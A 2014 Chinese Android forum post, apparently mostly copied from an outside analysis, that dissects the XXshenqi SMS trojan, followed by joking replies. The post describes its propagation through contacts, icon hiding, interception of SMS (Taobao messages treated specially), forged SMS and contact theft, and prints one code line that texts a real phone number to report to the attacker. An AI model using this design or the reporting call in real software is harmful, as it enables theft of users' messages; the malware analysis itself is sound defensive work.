已掉线,重新登录

首页 > 绿虎论坛 > 历史版块 > 手机 > 安卓

标题: 发现xxshenqi病毒确实挺实用和牛逼

作者: @Ta

时间: 2014-08-04

点击: 6453

刚刚看了下 病毒样本
发现确实牛逼
新闻没说

病毒分为两个部分,一个是XXshenqi.apk,另一个是com.android.Trogoogle.apk

骗取本机联系人点击恶意链接下载病毒进行传播。

发送成功后,执行:

SmsManager.getDefault().sendTextMessage(“18670259904″, null, “XXshenqi 群发链接OK”, null, null);

即向这个号码反馈执行信息。

开启一个MainActivity
在这个Activity中,安装一个com.example.com.android.trogoogle的文件,这个文件存在于xxshenqi.apk解压后文件的assets目录下。

安装木马后,会自动隐藏图标。
判断是否是命令短信,命令短信是用来向木马发送命令的。如果是平常的短信,就将截获的短信全部发往黑客手中,值得注意的是木马还判断短信是否是淘宝发送的短信,如果是的话就单独处理。

并且木马中还有发送伪造短信给用户的功能,如果是这种短信,木马就不会截获或者发送给黑客。

这里还存在的恶意行为是读取用户收件发件箱短信,以及手机中的联系人。

当截获完短信之后,木马就又开启了一个MySendEmailService服务。
这里也做了具体处理,就是判断是否是普通短信和淘宝网购信息,如果是淘宝信息就加上一个Flag发送,简直碉堡。

0×03

至此,这款病毒究竟做了些啥就基本清楚了,所做的操作也是一般短信木马的常有功能,包括截获短信并发送,发送恶意链接进行传播(冒充联系人发送,更有迷惑性),支持接收指令,以及发送恶意伪造的短信给用户(冒充联系人发送,更有迷惑性)等行为,
要是真早搞作者还可以对其进行加密,深度优化撒的可惜未加密直接导致了作者的手机号,QQ账号密码,小号被爆菊.....

[隐藏样式|查看源码]


『回复列表(15|隐藏机器人聊天)』

1. 看到这文章还以为是你自己写,原来又是复制粘贴来的
(/@Ta/2014-08-04 12:33//)

2. 同一楼
(/@Ta/2014-08-04 13:06//)

3. 同二楼
(/@Ta/2014-08-04 18:21//)

4. 同三楼
(/@Ta/2014-08-04 18:22//)

5. 同四楼
(/@Ta/2014-08-04 18:29//)

6. 同五楼
(/@Ta/2014-08-04 18:41//)

7. 同六楼
(/@Ta/2014-08-04 18:43//)

8. 同六楼
(/@Ta/2014-08-04 18:43//)

9. 同八楼,强势围观楼主被爆菊…
(/@Ta/2014-08-04 19:19//)

10. 同九楼
(/@Ta/2014-08-04 19:36//)

11. @太子爷,我只能说大部分复制的,样本我也看过,
(/@Ta/2014-08-04 20:24//)

12. 同十楼
(/@Ta/2015-02-04 23:02//)

13. @时空漫步,你挖坟的技术不错
(/@Ta/2015-02-04 23:09//)

14. 同一楼
(/@Ta/2015-03-12 11:32//)

15. 马勒戈壁
(/@Ta/2015-03-12 11:57//)

回复需要登录

7月1日 02:12 星期二

本站由hu60wap6驱动

备案号: 京ICP备18041936号-1